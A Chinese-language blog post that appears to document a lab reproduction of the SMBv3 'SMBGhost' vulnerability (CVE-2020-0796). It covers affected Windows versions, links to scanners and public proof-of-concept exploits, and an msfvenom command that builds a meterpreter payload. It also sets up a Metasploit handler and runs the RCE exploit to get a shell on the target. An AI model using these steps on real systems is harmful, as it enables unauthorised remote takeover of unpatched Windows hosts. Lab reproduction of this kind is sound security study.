1. 程式人生 > 其它 >《永恆之黑》CVE-2020-0796漏洞復現

《永恆之黑》CVE-2020-0796漏洞復現

《永恆之黑》CVE-2020-0796漏洞復現

  • |漏洞簡介

    2020年3月12日,微軟正式釋出CVE-2020-0796高危漏洞補丁,本漏洞源於SMBv3沒有正確處理壓縮的資料包,在解壓資料包的時候使用客戶端傳過來的長度進行解壓時,並沒有檢查長度是否合法,最終導致整數溢位。利用該漏洞,攻擊方可直接遠端攻擊SMB服務端遠端執行任意惡意程式碼,CVE-2020-0796漏洞與“永恆之藍”系列漏洞極為相似,都是利用Windows SMB漏洞遠端攻擊獲取系統最高許可權。

  • |影響版本

    Windows 10 Version 1903 for 32-bit Systems

    Windows 10 Version 1903 for x64-based Systems

    Windows 10 Version 1903 for ARM64-based Systems

    Windows Server, Version 1903 (Server Core installation)

    Windows 10 Version 1909 for 32-bit Systems

    Windows 10 Version 1909 for x64-based Systems

    Windows 10 Version 1909 for ARM64-based Systems

    Windows Server, Version 1909 (Server Core installation)

  • |漏洞復現

    1.環境搭建:

    kali 攻擊機:192.168.87.128

    win10靶機:192.168.87.143

    2.檢視win10靶機版本,win+r,輸入winver

    3.使用SMBGhost工具檢測win靶機是否存在漏洞,工具下載:https://github.com/ollypwn/SMBGhost

    也可以使用藍屏payload,驗證漏洞。藍屏poc下載:https://github.com/chompie1337/SMBGhost_RCE_PoC

    win10出現藍屏,說明存在漏洞

    當然也有其他很多方法,如:

    https://github.com/joaozietolie/CVE-2020-0796-Checker

    http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

    4.利用msfvenom生成的exp反彈shell

    msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -b '\x00' -i 1 -f python>exploit

    msf生成的exploit

    替換SMBGhost_RCE_PoC中的exploit.py,並把buf改為USER_PAYLOAD

    5.替換好了,設定msf監聽

    msfconsole //執行msf

    use exploit/multi/handler //開啟監聽模組

    set payload windows/x64/meterpreter/bind_tcp //設定反彈模式

    set rhost 192.168.87.143 //設定目標靶機ip

    set lport 4444 //設定監聽埠

    run //執行

    6.SMBGhost_RCE_PoC執行payload,python3 exploit.py -ip 192.168.87.143,反彈shell